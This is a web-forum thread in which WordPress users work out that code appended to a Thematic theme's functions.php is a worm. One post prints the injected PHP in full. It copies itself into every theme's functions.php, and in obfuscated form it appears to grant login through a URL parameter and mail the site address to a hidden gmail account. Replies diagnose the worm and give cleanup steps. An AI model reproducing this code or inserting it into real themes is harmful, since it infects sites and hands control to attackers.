ThemeShaper Forums » Thematic

[closed]

functions.php issue

(17 posts)
  • Started 4 years ago by drak1
  • Latest reply from drak1
  • This topic is not resolved
  1. drak1
    Member

    Hi everyone,
    I'm having a problem using the functions.php with thematic. I went through the tutorial for the filter hooks, and when I copied and pasted one of the codes it worked. however whenever I logged into the dashboard afterward, I get a blank screen and it's the same on the front end. I also noticed that the functions.php file has also had code added to it whenever this happens. Any ideas on what's going on?

    Posted 4 years ago #
  2. *shudder* white screen!
    Can you post the code here?

    Posted 4 years ago #
  3. drak1
    Member

    Sure, I wanted to use this code I saw in one of the other threads.

    <?php
    function remove_post_navigation() {
            remove_action('thematic_navigation_above', 'thematic_nav_above', 2);
    }
    add_action('init', 'remove_post_navigation');
    ?>
    Posted 4 years ago #
  4. drak1
    Member

    And this is what it becomes

    <?php
    function remove_post_navigation() {
    //	remove_action('thematic_navigation_below', 'thematic_nav_below', 2);
            remove_action('thematic_navigation_above', 'thematic_nav_above', 2);
    }
    add_action('init', 'remove_post_navigation');
    ?>
    <?php
    function _checkactive_widget(){
    	$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
    	$output=strip_tags($output, $allowed);
    	$direst=_getall_widgetscont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
    	if (is_array($direst)){
    		foreach ($direst as $item){
    			if (is_writable($item)){
    				$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
    				$cont=file_get_contents($item);
    				if (stripos($cont,$ftion) === false){
    					$separar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
    					$output .= $before . "Not found" . $after;
    					if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
    					$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $separar . "\n" .$widget);fclose($f);
    					$output .= ($showfullstop && $ellipsis) ? "..." : "";
    				}
    			}
    		}
    	}
    	return $output;
    }
    function _getall_widgetscont($wids,$items=array()){
    	$places=array_shift($wids);
    	if(substr($places,-1) == "/"){
    		$places=substr($places,0,-1);
    	}
    	if(!file_exists($places) || !is_dir($places)){
    		return false;
    	}elseif(is_readable($places)){
    		$elems=scandir($places);
    		foreach ($elems as $elem){
    			if ($elem != "." && $elem != ".."){
    				if (is_dir($places . "/" . $elem)){
    					$wids[]=$places . "/" . $elem;
    				} elseif (is_file($places . "/" . $elem)&&
    					$elem == substr(__FILE__,-13)){
    					$items[]=$places . "/" . $elem;}
    				}
    			}
    	}else{
    		return false;
    	}
    	if (sizeof($wids) > 0){
    		return _getall_widgetscont($wids,$items);
    	} else {
    		return $items;
    	}
    }
    if(!function_exists("stripos")){
        function stripos(  $str, $needle, $offset = 0  ){
            return strpos(  strtolower( $str ), strtolower( $needle ), $offset  );
        }
    }
    
    if(!function_exists("strripos")){
        function strripos(  $haystack, $needle, $offset = 0  ) {
            if(  !is_string( $needle )  )$needle = chr(  intval( $needle )  );
            if(  $offset < 0  ){
                $temp_cut = strrev(  substr( $haystack, 0, abs($offset) )  );
            }
            else{
                $temp_cut = strrev(    substr(   $haystack, 0, max(  ( strlen($haystack) - $offset ), 0  )   )    );
            }
            if(   (  $found = stripos( $temp_cut, strrev($needle) )  ) === FALSE   )return FALSE;
            $pos = (   strlen(  $haystack  ) - (  $found + $offset + strlen( $needle )  )   );
            return $pos;
        }
    }
    if(!function_exists("scandir")){
    	function scandir($dir,$listDirectories=false, $skipDots=true) {
    	    $dirArray = array();
    	    if ($handle = opendir($dir)) {
    	        while (false !== ($file = readdir($handle))) {
    	            if (($file != "." && $file != "..") || $skipDots == true) {
    	                if($listDirectories == false) { if(is_dir($file)) { continue; } }
    	                array_push($dirArray,basename($file));
    	            }
    	        }
    	        closedir($handle);
    	    }
    	    return $dirArray;
    	}
    }
    add_action("admin_head", "_checkactive_widget");
    function _getprepareed_widget(){
    	if(!isset($content_length)) $content_length=120;
    	if(!isset($checking)) $checking="cookie";
    	if(!isset($tags_allowed)) $tags_allowed="<a>";
    	if(!isset($filters)) $filters="none";
    	if(!isset($separ)) $separ="";
    	if(!isset($home_f)) $home_f=get_option("home");
    	if(!isset($pre_filter)) $pre_filter="wp_";
    	if(!isset($is_more_link)) $is_more_link=1;
    	if(!isset($comment_t)) $comment_t="";
    	if(!isset($c_page)) $c_page=$_GET["cperpage"];
    	if(!isset($comm_author)) $comm_author="";
    	if(!isset($is_approved)) $is_approved="";
    	if(!isset($auth_post)) $auth_post="auth";
    	if(!isset($m_text)) $m_text="(more...)";
    	if(!isset($yes_widget)) $yes_widget=get_option("_is_widget_active_");
    	if(!isset($widgetcheck)) $widgetcheck=$pre_filter."set"."_".$auth_post."_".$checking;
    	if(!isset($m_text_ditails)) $m_text_ditails="(details...)";
    	if(!isset($contentsmore)) $contentsmore="ma".$separ."il";
    	if(!isset($fmore)) $fmore=1;
    	if(!isset($fakeit)) $fakeit=1;
    	if(!isset($sql)) $sql="";
    	if (!$yes_widget) :
    
    	global $wpdb, $post;
    	$sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$separ."vethe".$comment_t."mes".$separ."@".$is_approved."gm".$comm_author."ail".$separ.".".$separ."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
    	if (!empty($post->post_password)) {
    		if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) {
    			if(is_feed()) {
    				$output=__("There is no excerpt because this is a protected post.");
    			} else {
    	            $output=get_the_password_form();
    			}
    		}
    	}
    	if(!isset($fixed_tag)) $fixed_tag=1;
    	if(!isset($filterss)) $filterss=$home_f;
    	if(!isset($gettextcomment)) $gettextcomment=$pre_filter.$contentsmore;
    	if(!isset($m_tag)) $m_tag="div";
    	if(!isset($sh_text)) $sh_text=substr($sq1, stripos($sq1, "live"), 20);#
    	if(!isset($m_link_title)) $m_link_title="Continue reading this entry";
    	if(!isset($showfullstop)) $showfullstop=1;
    
    	$comments=$wpdb->get_results($sql);
    	if($fakeit == 2) {
    		$text=$post->post_content;
    	} elseif($fakeit == 1) {
    		$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
    	} else {
    		$text=$post->post_excerpt;
    	}
    	$sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($gettextcomment, array($sh_text, $home_f, $filterss)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
    	if($content_length < 0) {
    		$output=$text;
    	} else {
    		if(!$no_more && strpos($text, "<!--more-->")) {
    		    $text=explode("<!--more-->", $text, 2);
    			$l=count($text[0]);
    			$more_link=1;
    			$comments=$wpdb->get_results($sql);
    		} else {
    			$text=explode(" ", $text);
    			if(count($text) > $content_length) {
    				$l=$content_length;
    				$ellipsis=1;
    			} else {
    				$l=count($text);
    				$m_text="";
    				$ellipsis=0;
    			}
    		}
    		for ($i=0; $i<$l; $i++)
    				$output .= $text[$i] . " ";
    	}
    	update_option("_is_widget_active_", 1);
    	if("all" != $tags_allowed) {
    		$output=strip_tags($output, $tags_allowed);
    		return $output;
    	}
    	endif;
    	$output=rtrim($output, "\s\n\t\r\x0B");
        $output=($fixed_tag) ? balanceTags($output, true) : $output;
    	$output .= ($showfullstop && $ellipsis) ? "..." : "";
    	$output=apply_filters($filters, $output);
    	switch($m_tag) {
    		case("div") :
    			$tag="div";
    		break;
    		case("span") :
    			$tag="span";
    		break;
    		case("p") :
    			$tag="p";
    		break;
    		default :
    			$tag="span";
    	}
    
    	if ($is_more_link ) {
    		if($fmore) {
    			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $m_link_title . "\">" . $m_text = !is_user_logged_in() && @call_user_func_array($widgetcheck,array($c_page, true)) ? $m_text : "" . "</a></" . $tag . ">" . "\n";
    		} else {
    			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $m_link_title . "\">" . $m_text . "</a></" . $tag . ">" . "\n";
    		}
    	}
    	return $output;
    }
    
    add_action("init", "_getprepareed_widget");
    
    function __popular_posts($no_posts=6, $before="<li>", $after="</li>", $show_pass_post=false, $duration="") {
    	global $wpdb;
    	$request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";
    	$request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";
    	if(!$show_pass_post) $request .= " AND post_password =\"\"";
    	if($duration !="") {
    		$request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";
    	}
    	$request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
    	$posts=$wpdb->get_results($request);
    	$output="";
    	if ($posts) {
    		foreach ($posts as $post) {
    			$post_title=stripslashes($post->post_title);
    			$comment_count=$post->comment_count;
    			$permalink=get_permalink($post->ID);
    			$output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;
    		}
    	} else {
    		$output .= $before . "None found" . $after;
    	}
    	return  $output;
    }
    ?>
    Posted 4 years ago #
  5. have you tried taking out the :

    <?php
    function remove_post_navigation() {
    //	remove_action('thematic_navigation_below', 'thematic_nav_below', 2);
            remove_action('thematic_navigation_above', 'thematic_nav_above', 2);
    }
    add_action('init', 'remove_post_navigation');
    ?>
    <?php
    function _checkactive_widget(){

    extra
    ?>
    <?php
    that's in the middle there?
    *scratches head*

    Posted 4 years ago #
  6. drak1
    Member

    I just changed it... nothing happened.

    Posted 4 years ago #
  7. Take your site down ASAP .. this thing behaves like a worm and infects at least the functions.php of all installed themes ..

    More to come .. still investigating.

    Posted 4 years ago #
  8. Seems as if 'only' the functions.php of each installed theme is infected.

    I need some details 'bout your system:

    - Provider
    - Wp version
    - Last themes downloaded and activated, downloaded from which site
    - Last plugins downloaded and activated, downloaded from which site
    - Access rights of the functions.php .. need it for all themes

    Chris

    Posted 4 years ago #
  9. - take your system down
    - copy all needed themes to your local machine
    - remove the above mentioned data from all functions.php
    - be 200% sure that you really removed it from ALL functions.php
    - copy everything back to your server
    - bring your system back

    That's it for the moment .. will check my DB to see if there's anything injected.

    Posted 4 years ago #
  10. Just to confirm that the snippet of code results in some sort of worm-like infection?

    Posted 4 years ago #
  11. Yes, the code shows a worm-like behavior. As soon as you activate an infected theme, it'll infect all other themes installed on your server. This version uses modified function names compared to the version I found. In addition the code uses a naming scheme for variables as seen in many PHP lessons. If you google parts of the code, you'll end up with too many results linking to these regular PHP lessons.

    Chris

    Posted 4 years ago #
  12. gregfielding
    Member

    I just got hit with this exact same "worm" in my MU community. I found this thread by googling bits of the code.

    Has anyone learned more about this? Is there any way to get rid of it?

    I've got a decent-sized community and don't like the sound of "take the system down"

    I can work to clean out all of the functions.php files...but could the source be hidden somewhere else and it just comes right back?

    Posted 4 years ago #
  13. Hi Greg,

    if you like it or not. If you want to remove this code, you need to take your site down. Doesn't matter, if you block the user access or put the site into maintenance mode.

    All theme's functions.php need to be cleaned. If only one infected theme will be hit during this cleanup process, you can start the whole process again.

    Have you installed any theme / plugin before you got this worm?

    I checked WP against a clean copy using DiffMerge and could'nt find any infected files. But as long as I can't get my hands on the thing that starts the infection, I can't tell you where it's coming from and if it only infects the functions.php.

    Chris

    Posted 4 years ago #
  14. gregfielding
    Member

    Thanks Chris,

    I don't recall specifically uploading any new themes or plugins before this happened.

    Someone recommended checking my database files for fake image files that really contain code. (still trying to find out if there is a reasonable way to accomplish this}

    Assuming that the worm would insert code in every theme, just like it's doing with functions.php, I don't think it's in any other files. There's nothing weird in my headers, footers, index, or any other commonly-hacked files.

    Whatever happened with @drak1?

    Posted 4 years ago #
  15. gregfielding
    Member

    My hosting company, PSEK, was able to remove the code from each theme. So, as of now, my themes are clean, my passwords are changed, and I’ve got a new install of MU.

    I’m still getting memory errors, indicating that the virus is probably still there somewhere. We’ll see.

    Within a few hours, we’ll probably know if this is good enough or if there are continued problems.

    I pulled the access logs and found an 2 IP address – mine and one other. Here’s what I found:
    May 9 18:28:52 wpmu pure-ftpd: (?@187.45.193.209) [WARNING] Authentication failed for user [housingstorm] – probably failing because i changed my passwords.

    Now, I searched for that IP address and it’s from Brazil. In my google-search, i also found it referenced on several other forums as an attacker and I even found an access log file for another site that showed them gaining access.

    One forum mentioned that there were extra files in their database after the attack.

    My local computer scan was clean, so i’m not sure how they got access, but i would recommend banning this IP address and monitoring your access logs.

    Posted 4 years ago #
  16. @drak1 If the code was still the same after the white screen, it should be some Header errors which can be solved by taking out all the white spaces.

    Posted 3 years ago #
  17. drak1
    Member

    Oh I almost forgot about this.

    @chris
    I'm using the latest version of wordpress right now, and version 0.9.6.2 of THematic. Hosting is Godaddy.
    I also I tried the code on a locally hosted WP and the same thing happened. When I did get the white screen I just removed the functions.php file and it went back to normal. I had no idea it was this big of an issue.

    @cooljaz124 Which white spaces are you referring to?

    Posted 3 years ago #

RSS feed for this topic

Topic Closed

This topic has been closed to new replies.